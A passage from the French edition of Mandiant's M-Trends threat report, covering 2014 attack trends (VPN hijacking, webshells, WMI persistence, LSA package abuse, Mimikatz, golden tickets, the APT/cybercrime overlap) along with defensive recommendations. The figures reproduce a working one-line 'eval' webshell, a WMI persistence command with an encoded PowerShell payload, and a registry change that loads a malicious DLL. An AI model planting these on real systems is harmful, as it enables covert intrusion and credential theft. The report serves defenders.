été dans la ligne de mire de cybercriminels motivés par l’appât du gain. L’année 2014
n’a pas dérogé à la règle. Certes, les attaquants ont encore plus fait parler d’eux
dans les médias. Mais malgré quelques nouveautés, ils ont récité une partition
globalement semblable à ce que nous avons observé ces dernières années.
Recommandations
Face à cette recrudescence d’attaques, quelle position les grandes enseignes doivent-elles adop-
ter ? D’abord, soyons clairs : il est impossible de bloquer toutes les attaques et toutes les compro-
missions. Toutefois, ces quelques recommandations pourront restreindre la capacité des atta-
quants à s’infiltrer dans votre environnement et à s’y déplacer latéralement. Avec les bons ou-
tils et une équipe de sécurité vigilante, vous pouvez ralentir la progression de l’attaque et vous
donner le temps nécessaire pour détecter, analyser et réagir avant que le pire ne se produise.
Accès distants sécurisés
Commencez par dresser un bilan des modes
d’accès distants de vos salariés, fournisseurs
et sous-traitants à votre environnement. En-
tamez un processus de contrôle de tous les
accès distants, notamment le nombre de mé-
thodes d’accès, les utilisateurs habilités et les
exigences en matière de mots de passe. Tous
les accès distants devraient être soumis à
une authentification à deux facteurs. Assu-
rez une surveillance active de toutes les
connexions distantes pour y déceler d’éven-
tuelles activités suspectes.
Accès sécurisés à l’environ­
nement PCI
Séparez votre environnement PCI (Payment
Card Industry) du reste de votre réseau.
Tout accès aux systèmes dans l’environ­ne-
ment PCI devra passer par un serveur de
rebond sécurisé, chargé de gérer les équipe-
ments au sein des zones à haute sécurité.
L’accès à ce serveur sera également soumis
à une authentification à deux facteurs.
Dans la mesure du possible, essayez de sé-
parer les domaines des magasins
pour res-
treindre les connexions à d’autres environ-
nements. De même, limitez les trafics réseau
sortant à une liste de connexions approuvées
dans le cadre de vos activités.
Établissez une liste blanche
d’applications pour vos systèmes
critiques
Pour éviter l’exécution de fichiers malveillants
sur des systèmes critiques, tous ces systèmes
devront tenir à jour une liste blanche d’appli-
cations autorisées. Ce dispositif s’étendra à
tous les systèmes qui traitent des données
de cartes bancaires, les serveurs de rebond
et d’autres systèmes critiques comme les
contrôleurs de domaine.
Gestion des comptes à forts
privilèges
Administrateur local, administrateur de
domaine, comptes de service… les atta-
quants ciblent en priorité les comptes dotés
de forts privilèges. La première chose à faire
est donc d’en réduire le nombre. De même,
assurez-vous que tous les comptes admi-
nistrateurs locaux utilisent bien des mots de
passe différents. Un outil d’administration et
de protection des mots de passe vous per-
mettra de gérer des identifiants uniques et
de changer le mot de passe d’un compte
après chaque utilisation. Ces technologies
vous confèreront une plus grande maîtrise
des comptes privilégiés.
www.mandiant.com	13
TENDANCE 3 :
L’ÉVOLUTION DU CYCLE DE VIE
DES ATTAQUES
La majorité des incidents sur lesquels nous enquêtons suivent un schéma classique
que nous appelons « cycle de vie des attaques ».
L
es équipes de sécurité et les attaquants
semblent constamment jouer au chat et à
la souris : à peine les uns déploient-ils de
nouveaux dispositifs de défense qu’aussitôt, les
autres modifient leurs tactiques. Cette tendance
s’est poursuivie en 2014, année marquée entre
autres par une hausse des détournements des
connexions VPN visant à maintenir un accès
permanent aux environnements des entreprises
victimes. Nous avons également observé l’émer-
gence de techniques élaborées permettant d’é-
chapper aux systèmes de détection, sans oublier
de nouveaux outils et tactiques destinés à voler
des identifiants et à se déplacer latéralement
dans les environnements compromis.
Détournements des connexions VPN
L’accès au VPN d’une entreprise offre deux
avantages décisifs aux attaquants : 1) celui de
s’implanter dans un environnement sans avoir à
y installer de portes dérobées et 2) celui de se
fondre dans la masse en imitant les comporte-
ments d’utilisateurs autorisés.
Ainsi, une fois sur le réseau, les groupes d’attaque
que nous avons étudiés se sont immédiatement
tournés vers les dispositifs VPN et leurs identi-
fiants d’accès. En ce sens, 2014 fut une nouvelle
année record : jamais nous n’avions recensé
autant de cas d’accès malveillants aux VPN des
entreprises.
La plupart de nos investigations ont fait
apparaître deux grands vecteurs d’attaques des
VPN :
•	 Authentification à facteur unique : si
l’accès au VPN ne s’effectuait que par nom
d’utilisateur et mot de passe valides, les
attaquants n’ont eu qu’à réutiliser des iden-
tifiants récupérés dans le domaine Active
Directory ou les systèmes compromis des
utilisateurs.
•	 Authentification à deux facteurs basée
sur des certificats : dès lors que le
deuxième facteur d’authentification était un
certificat numérique propre à chaque
utilisateur, les attaquants se sont servis
d’outils très courants comme Mimikatz
pour extraire ces certificats des systèmes
compromis. Dans certains scénarios, le
manque de sécurité dans la distribution des
certificats VPN (pièce jointe d’e-mails
non-cryptés ou plates-formes ouvertes de
partage de fichiers) leur a facilité la tâche.
Dans des cas plus rares, les attaquants ont eu
recours à des exploits zero-day pour contourner
le processus d’authentification VPN. Nous cite-
rons évidemment « Heartbleed », une vulnéra-
bilité dans l’extension Heartbeat du protocole
TLS (Transport Layer Security) qui a fait les gros
titres en avril dernier. Cette faille permettait en
effet aux attaquants de récupérer des buffers
mémoire de 64 Ko sur les serveurs et périphé-
riques vulnérables, et ce à partir d’une simple
requête.
Au moment de la découverte de Heartbleed, l’im-
pact de cette vulnérabilité et les probabilités de
vol de données sensibles (clés de cryptage, iden-
tifiants, etc.) ont fait débat chez les spécialistes.
Mais leurs pires craintes se sont hélas réalisées.
Ainsi, quelques semaines après le signalement,
nous avons enquêté sur une attaque au cours de
laquelle cette faille avait servi à détourner les
sessions d’utilisateurs authentifiés pour accéder
au réseau de l’entreprise ciblée, et ce sans aucun
identifiant. Les semaines suivantes, les attaquants
répétèrent l’opération sur les infrastructures
VPN d’autres entreprises.
14 	 www.mandiant.com
Les nouvelles du frontM-Trends
Dans tous ces cas de figures, les journaux des
connexions VPN ont gardé des traces révélatrices
des modes opératoires. Ainsi, les adresses IP en
provenance des sessions utilisateurs authenti-
fiées changeaient rapidement entre différents
blocs d’adresses, différents fournisseurs IP et
différentes zones géographiques.
Dissimulation de malwares sous le
nez des victimes
En 2014, la détection de malwares s’est de
nouveau apparentée à une course à l’armement
entre attaquants et défenseurs. Ainsi, on a
assisté à l’émergence de nouvelles techniques
permettant aux attaquants de camoufler leurs
actions et de dissimuler des malwares sur les
systèmes infectés.
Dissimulation de webshells
Connues sous le nom de webshells, les portes
dérobées basées sur le Web sont une forme de
malware apparu il y a une dizaine d’années.
Aujourd’hui, leurs capacités à échapper aux sys-
tèmes de détection des hôtes et des réseaux en
font un outil privilégié pour les attaques ciblées.
Figure 4 : Nouvelles techniques d’attaque observées durant les enquêtes Mandiant
Compromission
initiale
Implantation Escalade
des privilèges
Reconnaissance
interne
Mission
accomplie
Déplacement
latéral
Maintien
de présence
Détournement de
connexions VPN
Jamais Mandiant n’a observé
autant de cas d’accès malveil-
lants aux VPN des entreprises. Packages de sécurité malveillants
Les attaquants ont profité de l’extensi-
bilité des packages de sécurité
Windows pour charger des portes
dérobées et des enregistreurs de
mots de passe.
Dissimulation de webshells
Les attaquants n’ont cessé d’innover pour
déployer et dissimuler des malwares sur le Web.
Mandiant a observé plusieurs techniques, dont
les suivantes :
• Implantation sur les serveurs de scripts shell
exploitant le cryptage SSL pour contourner les
dispositifs de surveillance réseau
• Intégration d’une ligne de script shell ‘eval’ sur
des pages Web légitimes
• Fichiers de configuration serveurs modifiés
pour charger des fichiers DLL malveillants
Exploitation du système WMI
et du langage PowerShell
Pour maintenir leur présence, col-
lecter des données et se déplacer
latéralement dans les environne-
ments infiltrés, les attaquants ont
eu de plus en plus recours aux
composants Windows WMI et
PowerShell.
Attaques Kerberos
Après s’être approprié des privilèges d’administrateur
de domaine, les attaquants ont lancé des attaques
Kerberos « golden ticket » pour s’authentifier comme
n’importe quel utilisateur privilégié – même après
réinitialisation des mots de passe du domaine.
Mots de passe en clair
Les attaquants ont exploité des varian-
tes recompilées de l’utilitaire Mimikatz
pour récupérer des mots de passe en
clair dans la mémoire, tout en échap-
pant aux détections anti-virus.
À mesure que les défenses se
renforcent, les attaquants s’adap-
tent et innovent. En 2014, nous
avons constaté l’émergence de
nouvelles techniques de piratage à
chaque étape du cycle de vie des
attaques. En voici les grandes
lignes.
Nous avons étudié plusieurs cas où les atta­
quants étaient parvenus à installer leurs
webshells sur des serveurs cryptant leurs
communications par SSL (Secure Layer Socket).
En conséquence, toutes les requêtes émises
vers et depuis la porte dérobée étaient cryptées
par la propre clé privée (légitimement installée)
du serveur. L’architecture réseau de la victime
n’ayant pas été configurée pour contrôler le
trafic SSL, les actions des attaquants sont
passées totalement inaperçues.
Nous prévoyons la poursuite de cette tendance,
à l’heure où de plus en plus d’entreprises adop-
tent le SSL pour crypter l’ensemble de leurs
services Web déployés sur Internet.
Autre technique furtive observée : le détour-
nement des pages Web légitimes à l’aide de
scripts shell ‘eval’. Conçus pour exécuter du code
à partir d’un paramètre de requête HTTP, ces
mini-scripts de quelques dizaines d’octets se
dissimulent facilement dans un fichier HTML
plus long.
www.mandiant.com	15
composants OS basiques et exécuter des com-
mandes. Par ailleurs, WMI fournit un framework
d’événements capable de déclencher des appli-
cations (y compris des malwares) en fonction
des changements d’état d’objets spécifiques.
Ces dernières années, nous n’avions rencontré
que peu de cas d’utilisation de WMI pour échap-
per aux détections. Ceci s’explique probable-
ment par la complexité des interactions WMI et
la disponibilité de techniques de persistance
plus simples et suffisamment efficaces pour
rester incognito. Toutefois, en 2014, quelques
groupes se sont servis de WMI pour maintenir
une présence discrète dans les environnements
infiltrés.
Cette technique consiste à créer trois objets
WMI (généralement à l’aide du langage Power-
Shell):
•	 Filtre d’événements : cet objet interroge le
système sur un événement récurrent (par
exemple une heure donnée ou le nombre de
secondes écoulées depuis le démarrage de
la machine) qui pourrait servir de mécanisme
de persistance.
•	 Consommateur d’événements : cet objet
exécute un script ou une commande spéci-
fique permettant de « consommer » l’événe-
ment. En général, les attaquants créent soit
des consommateurs d’événements de ligne
de commande (pour l’exécution d’une com-
mande arbitraire), soit des consommateurs
de script actif (pour l’exécution de scripts
VBScript).
•	 Liaison consommateur-filtre : cet objet
assure l’exécution d’un consommateur
d’événements lorsqu’un filtre est activé.
Figure 5 : Exemple de webshell ‘eval’
<%@ Page Language=”Jscript”%><%eval(Request.Item[“p1”],”unsafe”);%>
Figure 6 : Extrait de fichier web.config modifié
<!--HTTP Modules -->
<modules>
<add type=”Microsoft.Exchange.Clients.BadModule” name=”BadModule” />
</modules>
Ainsi, pour les requêtes HTTP ordinaires, la page
Web infectée s’affiche normalement. Mais dès
lors que l’attaquant utilise un certain paramètre
dans sa requête, la commande ‘eval’ se met à
parser et exécuter le code malveillant.
La figure 5 montre un script shell ‘eval’ qui peut
être soit autonome, soit incorporé à une autre
page Web. Le client webshell de l’attaquant
devra intégrer le code malveillant dans le
paramètre de requête p1.
Dernier exemple de technique d’attaque par
malware sur le Web : la modification du fichier
de configuration (web.config) d’un serveur Web
exécutant les services Microsoft IIS (Internet
Information Services). Particulièrement astu-
cieuse, cette technique pousse le serveur infec-
té à charger un module HTTP malveillant. La
figure 6 montre un extrait « désinfecté » d’un
fichier web.config modifié.
Ce changement déclenche le chargement du
fichier BadModule.dll à partir d’un répertoire de
modules partagé et son utilisation pour le traite-
ment de toutes les requêtes Web ultérieures.
Ainsi, le malware parse et récupère les contenus
de toutes les requêtes Web envoyées au serveur
– y compris les identifiants utilisateurs. La figure 6
est un extrait de fichier web.config « désinfecté ».
Dans l’attaque réelle, le nom du module simule
une vraie DLL Microsoft. Pour échapper à toute
détection, l’attaquant modifie les horodatages
du malware et du fichier de configuration.
WMI comme vecteur de persistance
Composant majeur de Windows, WMI (Windows
Management Instrumentation) intègre un large
éventail d’interfaces et de fonctionnalités de
gestion système. Les applications et langages
comme PowerShell et VBScript utilisent WMI
pour collecter des données, interagir avec des
16 	 www.mandiant.com
Les nouvelles du frontM-Trends
Figure 7 : Comment les attaquants utilisent WMI pour maintenir une présence persistante
WMI interroge régulièrement le système sur la requête dans le filtre d’événements.
Dans cet exemple, la condition associée au filtre est remplie tous les jours à 08h05.2
Une fois le filtre activé, WMI lance automatiquement le consommateur d’événe-
ments qui lui est rattaché. Cet exemple montre une partie du consommateur de
ligne de commande exécutant un script PowerShell avec un code malveillant
fourni sous forme d’argument encodé en Base64.
3
L’attaquant crée trois objets WMI à partir de commandes Powershell : un consom-
mateur qui exécute une commande ou un script, un filtre qui interroge le système
sur un événement récurrent et une liaison pour relier le filtre au consommateur.
1
Espace de noms WMI (rootsubscription)
Consommateur
d’événements
« Exécuter ce script ou
cette commande... »
Filtre d’événements
« Rechercher cet
événement récurrent
dans le système... »
Liaison consommateur-filtre
« Utiliser ce filtre pour déclencher
ce consommateur »
Set-WmiInstance
SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE
TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour
= 08 AND TargetInstance.Minute = 05 GROUP WITHIN 60
CommandLineTemplate="C:WINDOWSSystem32WindowsPowerShellv1.0powershell.exe
–NonInteractive –enc SQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAALQBDAG8AbQBwAHUAdABl..."
www.mandiant.com	17
La figure 8 montre un exemple de syntaxe
PowerShell permettant de créer un consomma-
teur WMI de ligne de commande, chargé à son
tour d’exécuter le programme powershell.exe
– avec en argument une chaîne encodée en
Base64. N’importe quel code PowerShell (par
exemple un programme de téléchargement ou
une porte dérobée standard) pourra être ajouté
à cette chaîne, et ce sans aucun fichier de script
sur le disque. Rattaché à un filtre d’événements
approprié, ce consommateur pourra s’exécuter
de manière récurrente.
La persistance établie via WMI place les
analystes forensiques devant plusieurs défis.
Non seulement les commandes PowerShell
permettent aux attaquants de créer des filtres
et des consommateurs exécutables à la fois en
local et à distance, mais contrairement à de
nombreux mécanismes de persistance, ils ne
laissent aucune trace dans le registre.
Par ailleurs, les objets sont stockés sur disque
dans une base de données complexe (le référen-
tiel WMI object.data) et parfois difficile à analyser.
Enfin, Windows n’audite les filtres et consomma-
teurs nouvellement créés ou déclenchés que
lorsque la journalisation de niveau débogage est
activée. Or, cette journalisation n’est ni paramé­
trée par défaut, ni destinée à être utilisée à long
terme en raison du volume important d’événe-
ments qu’elle génère.5
Packages de sécurité malveillants
À plusieurs occasions, les attaquants se sont ser-
vis des packages de sécurité LSA (Local Security
Authority) de Windows pour charger automa-
tiquement des malwares tout en échappant aux
systèmes de détection. Les packages de sécurité
sont un ensemble de fichiers DLL chargés par la
LSA au démarrage du système et configurés
sous le paramètre « Valeurs » de la clé de
registre HKLM SYSTEMCurrentControlSet
ControlLsa. Chacune de ces valeurs contient
une liste de chaînes référençant des noms de
fichiers (sans extension) à charger depuis
%SYSTEMROOT%system32.
Étant automatiquement chargés via le fichier
LSASS.EXE, les packages LSA permettent à un
attaquant doté de privilèges administrateur
d’ajouter ou modifier les valeurs nécessaires
pour maintenir la présence d’un fichier DLL
malveillant. Ainsi, une de nos enquêtes menées
en 2014 a révélé une modification de la valeur
Packages de sécurité pour maintenir la présence
du chargeur d’une porte dérobée multi-étapes,
tspkgEx.dll, sur le système.6
La figure 9 illustre la valeur modifiée.
Ce changement contraint le programme
LSASS.EXE à lancer le fichier DLL tspkgEx (C:
WINDOWSsystem32tspkgEx.dll) au démarrage
du système.
5	
Organisés lors de la conférence Mandiant MIRcon 2014, les débats consacrés à WMI et PowerShell fournissent de plus amples détails et des études de
cas sur ces techniques – ainsi que des recommandations pour la détection et l’analyse forensique. Pour visionner les présentations, rendez-vous sur
https://dl.mandiant.com/EE/library/MIRcon2014/ MIRcon_2014_IR_Track_There%27s_Something_About_WMI.pdf et https://dl.mandiant.com/EE/
library/MIRcon2014/MIRcon_2014_IR_Track_ Investigating_Powershell_Attacks.pdf.
6	
Dans cet exemple, nous avons « désinfecté » le nom de la DLL.
Figure 8 : Extrait de commande PowerShell pour la création d’un consommateur WMI
Set-WmiInstance -Namespace “rootsubscription” -Class ‘CommandLineEventConsum-
er’ -Arguments @{ name=’EvilWMI’;CommandLineTemplate=”C:WINDOWSSystem32
WindowsPowerShellv1.0powershell.exe –enc SQBuAHYAbwBrAGUALQBDAG8AG8A-
bQ...<SNIP>”;RunInteractively=’false’}
Figure 9 : Modification de la clé HKLMSYSTEMCurrentControlSetControlLsaSecurity Packages pour le chargement du malware
PACKAGES DE SÉCURITÉ (avant modification): kerberos msv1_0 schannel wdigest
tspkg pku2u
PACKAGES DE SÉCURITÉ (après modification): kerberos msv1_0 schannel wdigest
tspkg pku2u tspkgEx
18 	 www.mandiant.com
Les nouvelles du frontM-Trends
L’extensibilité de LSA permet d’utiliser des pack-
ages de sécurité personnalisés pour traiter les
identifiants des utilisateurs lors d’une ouverture
de session. Or, un package de sécurité malveil-
lant peut détourner cette fonctionnalité pour
capturer des mots de passe en clair au moment
de la connexion.
Une de nos enquêtes menées en 2014 a mis en
lumière ce mode opératoire par lequel un atta-
quant a chargé un malware sous forme de pack-
age de sécurité qui lui a permis de faire main
basse sur des mots de passe. Largement dispo-
nible, le kit d’attaque Mimikatz7
intègre égale-
ment un outil, mimilib ssp, capable de voler des
mots de passe une fois lancé.8
Vol de mots de passe en toute
simplicité
Très répandus, les outils de vol d’identifiants ont
grandement facilité la collecte de mots de passe
et l’escalade de privilèges dans les environne-
ments Windows. En 2014, les auteurs d’attaques
ciblées ont eu principalement recours à deux
techniques :
•	 La méthode « pass-the-hash » pour
s’authentifier à l’aide de hashs NTLM volés
•	 L’outil Mimikatz pour récupérer les mots de
passe en clair dans la mémoire
À défaut de neutraliser complètement ces
méthodes, Microsoft est parvenu à en réduire
l’efficacité sur ses systèmes Windows Server
2012 R2 et Windows 8.1. Or, la plupart des
entreprises avec lesquelles nous avons travaillé
l’an dernier exploitaient encore des domaines
fonctionnels Windows Server 2008 et des
terminaux Windows 7.
De fait, « pass-the-hash » continue de faire des
ravages, notamment dans les environnements
où les mots de passe des administrateurs locaux
sont communs à tout un groupe de systèmes.
Quant à Mimikatz, il va encore plus loin en récu-
pérant les mots de passe Windows en clair que
l’OS stocke en mémoire pour gérer les diffé-
rentes formes d’authentifications uniques (SSO).
Sur le poste de travail d’un salarié, le risque peut
se limiter au seul mot de passe du compte de son
domaine. Mais dans le cas d’un serveur partagé
gérant de nombreuses sessions de connexion
interactives, par exemple via le protocole RDP
(Remote Desktop Protocol) ou l’utilitaire PsExec,
le nombre de mots de passe exposés sera
beaucoup plus élevé. Les entreprises victimes
n’ont pu que constater l’incroyable vitesse avec
laquelle l’infection de quelques systèmes
pouvait se propager à un domaine Active
Directory complet.
Presque toutes nos investigations ont révélé
l’incapacité des logiciels anti-virus des entre­
prises à stopper Mimikatz, et ce malgré la
réputation et le vaste champ d’action de cet
outil. Pour échapper aux systèmes de détection,
les attaquants n’ont souvent eu qu’à modifier et
recompiler le code source. Mais ils ont aussi
déployé des variantes de l’outil, comme le script
PowerShell « Invoke-Mimikatz » qui s’exécute
uniquement en mémoire.
L’année 2014 a également vu l’émergence d’un
certain nombre d’attaques visant Kerberos, le
mécanisme d’authentification par défaut des
domaines Windows récents. Au premier rang
de ces attaques, on trouve le « golden ticket »
Mimikatz, qui permet à un intrus ayant com-
promis un contrôleur de domaine d’émettre
un ticket TGT (ticket-granting ticket) pour
n’importe quel utilisateur.
Presque toutes nos investigations ont révélé l’incapacité des logiciels anti-
virus des entreprises à stopper Mimikatz, et ce malgré la réputation et le
vaste champ d’action de cet outil. Pour échapper aux systèmes de détection,
les attaquants n’ont souvent eu qu’à modifier et recompiler le code source.
7	
https://github.com/gentilkiwi/mimikatz5	
8	
Lors du MIRCon 2014, Matt Graeber a présenté ses nouvelles analyses sur les packages de sécurité malveillants et les mécanismes permettant de les
détecter et d’en limiter l’exploitation. À consulter sur https://dl.mandiant.com/EE/library/MIRcon2014/MIRcon_2014_IR_Track_Analysis_of_Malicious_
SSP.pdf
www.mandiant.com	19
Ce « ticket en or » porte bien son nom puisqu’il
peut être généré hors ligne, rester valide pour
une durée indéterminée et être utilisé pour
usurper n’importe quel compte – même après la
réinitialisation d’un mot de passe. Une fois ce
ticket en main, un attaquant peut se réintroduire
sur un environnement « assaini » et se réappro-
prier instantanément les privilèges administra-
teur du domaine.
À défaut de pouvoir éviter la compromission
initiale, le seul moyen d’y remédier consiste à
réinitialiser deux fois de suite le mot de passe
krbtgt, nom du compte de service de distribution
de clés Kerberos. Cette procédure permet d’effa-
cer l’historique des mots de passe du compte et
d’annuler tous les tickets Kerberos précédem-
ment émis.
Déplacements latéraux avec WMI et
PowerShell
Par le passé, les déplacements latéraux et exécu-
tions de commandes d’attaque contre un envi-
ronnement Windows combinaient généralement
des utilitaires Windows intégrés (net, at, etc.),
des malwares personnalisés, des scripts de
commandes ou Visual Basic, et des outils d’admi-
nistration courants comme PsExec. Prisées des
attaquants du fait de leur fiabilité et de leur
simplicité d’utilisation, ces techniques laissent
cependant derrière elles bon nombre de traces
et d’empreintes compromettantes.
C’est ainsi qu’entre 2013 et 2014, nous avons
observé une évolution manifeste des modes de
déplacement latéral des groupes APT (Advanced
Persistent Threat) que nous surveillons. Désor-
mais, ces groupes ont davantage recours au
système WMI et au langage PowerShell pour se
déplacer latéralement, voler des identifiants et
glaner des informations utiles dans les environ-
nements Windows.
De même, un grand nombre de chercheurs en
sécurité et d’outils de tests d’intrusion ont adop-
té le langage PowerShell ces dernières années.
Cette généralisation a entraîné une plus grande
diffusion publique d’informations et de codes
source dont chaque camp profite pour se
perfectionner.
Nous avons décrit plus haut la manière dont les
attaquants exploitent des événements WMI
pour maintenir leur présence dans des environ­
nements compromis. Outre cette méthode, ils
utilisent également l’outil de ligne de commande
wmic.exe pour étendre les fonctionnalités de
WMI aux scripts et à l’interface système (shell).
WMI leur sert à se connecter à des systèmes
distants, modifier le registre, accéder aux jour-
naux d’événements et, plus important encore,
exécuter des commandes. Hormis un événement
d’ouverture de session initiale, les commandes
WMI à distance ne laissent que très peu de
preuves sur le système infiltré.
Dans plusieurs cas analysés en 2014, les atta-
quants se sont appuyés sur des commandes
PowerShell à distance et des scripts en mémoire
pour se déplacer latéralement et récupérer des
données d’identification. Un code PowerShell
peut s’exécuter en mémoire sans jamais passer
par les disques du système infiltré, limitant ainsi
toute forme de trace. De plus, les anciennes
versions de PowerShell installées par défaut
dans la plupart des environnements ne peuvent
maintenir aucune piste d’audit détaillée du code
exécuté.
À RETENIR : Les auteurs d’APT ne cessent d’améliorer leurs outils et tactiques
pour laisser un minimum de traces et échapper aux systèmes de détection. C’est
pourquoi les entreprises ciblées doivent maintenir des dispositifs de surveillance en
temps réel et d’analyse forensique post-incident sur tous leurs terminaux, sources
de journaux et équipements réseau. Elles veilleront également à établir des seuils
d’activité normale et à intervenir proactivement en cas d’écart pour garder un coup
d’avance sur les attaquants.
20 	 www.mandiant.com
Les nouvelles du frontM-Trends
N
ous avons passé l’an dernier à enquêter
sur des attaques qui nous ont permis de
remonter jusqu’à la piste russe. Ces
investigations ont toutefois révélé des zones
d’ombre qui rendent très difficile la distinction
entre les gangs de cybercriminels d’une part,
et les groupes étatiques d’autre part. Dans ce
contexte de fusion des divers outils et méthodes,
vous devrez orienter votre analyse sur les inten-
tions des attaquants pour en évaluer l’impact
potentiel.
Certaines des attaques ciblées à caractère fi-
nancier que nous avons disséquées présentent
une physionomie qui tient davantage des orga-
nisations étatiques que du profil type du cyber-
criminel opportuniste. La figure 10 en page 21
fait un point sur les croisements entre les
groupes APT connus et les cas de cybercrimes
que nous avons rencontrés en 2014.
Évaluer l’intention dans un climat
d’incertitude : une tâche délicate
Étant donné ces chevauchements, les analystes
doivent aborder leur décryptage des motiva-
tions avec une grande ouverture d’esprit. En ce
sens, il ne suffit pas de se pencher sur tel outil ou
telle méthode de manière isolée. Certaines
activités observées en Russie l’an passé mettent
en évidence l’importance et la difficulté d’une
analyse des objectifs finaux pour l’interprétation
de leur démarche technique.
En octobre 2014, nous avons exposé le détail
des activités d’APT28, un groupe que nous soup-
çonnons d’exfiltrer de l’intelligence politique et
militaire au profit du gouvernement russe.
Depuis des années, APT28 s’en prend à l’indus-
trie de la défense, aux puissances étrangères,
aux complexes militaires et aux organismes
intergouvernementaux.
Des chercheurs ont également révélé l’existence
d’un autre groupe basé en Russie et qui, comme
APT28, semble mener des activités d’espion-
nage pour Moscou. Cette seconde filière est
connue sous divers noms : “Sandworm Team,”9
“Quedagh”10
et “BE2 APT.”11
TENDANCE 4 :
ENTRE CYBERCRIMINELS ET
GROUPES APT, LA FRONTIÈRE
S’ESTOMPE
Les enquêtes menées l’an passé révèlent l’émergence d’une nouvelle tendance : les
cybercriminels tendent à s’inspirer des méthodes des auteurs d’APT, tandis que de
leur côté, ces derniers utilisent des outils déjà très en vogue chez les cybercriminels.
Face à cette convergence, il devient impératif de bien cerner les motivations d’une
attaque pour en évaluer l’impact et développer une stratégie de sécurité basée sur
le risque.
9	
Cyber Espionage Operators Sandworm Team Leverage CVE-2014-4114 Zero-Day.” iSight Partners. 14 octobre 2014. Web. 2 décembre 2014.
10	
https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf
11	
https://securelist.com/blog/research/67353/be2-custom-plugins-router-abuse-and-target-profiles/
www.mandiant.com	21
12	
https://www.fireeye.com/blog/threat-research/2014/04/crimeware-or-apt-malwares-fifty-shades-of-grey.html
13	
APT18 est également un groupe basé en Chine. Voir https://www2.fireeye.com/WBNR-14Q3HealthcareWebinar.html
TACTIQUES EXEMPLES DE CROISEMENTS
Ingénierie sociale
L’ingénierie sociale n’est pas la chasse gardée des groupes APT. En 2014, certaines attaques à
caractère financier ont eu recours au spearphishing et à ses e-mails ciblés, tant pour l’infection
initiale que lors de tentatives de reprise de contrôle de l’environnement post-neutralisation.
L’ingénierie sociale interactive représente une autre méthode utilisée à la fois chez les cyber-
criminels et les groupes APT. Sur l’une de nos missions, une attaque à motivation financière était
passée par des profils professionnels factices sur les réseaux sociaux. Le but : établir le contact
avec les salariés de l’entreprise ciblée et les inciter à télécharger un malware d’installation d’une
porte dérobée. De son côté, APT3, un groupe soupçonné de travailler pour une puissance
étrangère, a créé de toutes pièces un personnage de femme d’affaires qu’il a ensuite utilisé pour
contacter un collaborateur de sa cible sur un grand réseau social professionnel. Après trois
semaines d’échanges de messages, “elle” a envoyé son “CV” à l’adresse e-mail personnelle de son
interlocuteur – CV qui contenait en fait une porte dérobée du groupe APT3. Son travail de sape
s’est également étendu à d’autres collaborateurs de l’entreprise par des questions de type « Quel
est le nom de votre directeur informatique ? » ou « Vous utilisez quelle version de ce logiciel ? ».
Outils et malwares
personnalisés
La création d’outils personnalisés a cours tant dans le milieu des APT que du cybercrime financier.
Dans un cas précis, les cybercriminels ont même déployé plus de 60 variantes de malwares et d’uti-
litaires qu’ils avaient améliorés au cours de plusieurs années de présence furtive dans l’environne-
ment de la victime. Pour sa part, le groupe russe APT28 a passé ces sept dernières années à amélio-
rer la flexibilité de ses malwares de manière à maintenir sa présence dans un environnement infecté.
Crimeware
On retrouve dans cette catégorie tous les toolkits accessibles gratuitement ou vendus à des fins
lucratives. Le crimeware n’est cependant pas l’apanage des cybercriminels. Ainsi, un groupe sus-
pecté de lancer des attaques APT depuis la Russie a utilisé un exploit zero-day pour installer des
variantes de BlackEnergy, un toolkit très prisé des cybercriminels depuis des années. Dans un milieu
comme dans l’autre, les outils d’accès distant sont omniprésents12
, preuve s’il en est que les outils
eux-mêmes ne peuvent constituer le seul facteur déterminant dans l’attribution d’une attaque.
Maintien de la
persistance
Le cybercrime n’est plus dominé par le « smash-and-grab », sorte de vol éclair avec effraction. En
effet, si la persistance a longtemps été la signature des auteurs d’APT, qui maintiennent leur pré-
sence dans un environnement jusqu’à l’accomplissement de leur mission, le cybercrime financier
montre de plus en plus sa capacité à agir en sous-marin. Dans un cas précis, les cybercriminels sont
passés par les registres de démarrage Windows pour lancer le malware qui leur a permis de main-
tenir une présence incognito dans l’environnement. Dans un autre cas de figure, les malfaiteurs
sont parvenus à agir secrètement pendant 5 ans avant d’être débusqués. Nous avons même obser-
vé chez eux des tentatives de réimplantation dans l’environnement dont ils venaient d’être chassés.
Étendue du vol de
données
Le vol de données s’opère sur une échelle plus large et sur des ensembles de données plus volu-
mineux que jamais. Ainsi, les attaquants ont poursuivi leur offensive sur de vastes référentiels de
données d’identification personnelle (PII, Personally Identifiable Information). Historiquement, ces
vols de données étaient systématiquement imputés au milieu du cybercrime financier qui les
utilisait soit pour ses propres activités frauduleuses, soit pour les revendre sur un marché sous-
terrain. Or, les PII attirent désormais la convoitise des auteurs d’APT, et ce pour des raisons
totalement étrangères à tout appât du gain. Pour preuve, nous avons mis au grand jour des vols
de PII commis par le groupe APT18 – une activité qui sort de son périmètre d’action habituel.13
Figure 10 : La convergence des méthodes entre groupes APT et cybercriminels
22 	 www.mandiant.com
Les nouvelles du frontM-Trends
14	
http://blog.trendmicro.com/trendlabs-security-intelligence/sandworm-to-blacken-the-scada-connection/
15	
https://www.virusbtn.com/conference/vb2014/abstracts/LM3-LipovskyCherepanov.xml
16	
BlackEnergy offre un framework extensible qui permet aux hackers d’ajouter de nouvelles caractéristiques et fonctionnalités via des bibliothèques DLL
(Dynamic Link Library). Chaque plugin DLL peut être codé pour un usage spécifique, puis stocké dans un fichier crypté. En surface, ils ont tous la même
apparence, ce qui complique le décryptage des intentions du hacker. Très prisé des cybercriminels, BlackEnergy est souvent utilisé pour des attaques de
déni de service (DDoS). (Voir http:// atlas-public.ec2.arbor.net/docs/BlackEnergy+DDoS+Bot+Analysis.pdf; http://blogs.mcafee.com/business/
security-connected/evolving-ddos-botnets-1- blackenergy)
17	
http://blog.trendmicro.com/trendlabs-security-intelligence/sandworm-to-blacken-the-scada-connection/
Le groupe ciblait manifestement les mêmes
profils de victimes qu’APT28, avec toutefois
quelques différences clés. À commencer par les
exploits zero-day et les outils de cybercrime
utilisés. On le soupçonne par ailleurs de s’être
attaqué à des infrastructures critiques aux
États-Unis.14, 15
Les analyses du malware et de l’infrastructure
utilisés ont révélé que l’équipe Sandworm s’est
servie du toolkit BlackEnergy16
pour cibler des
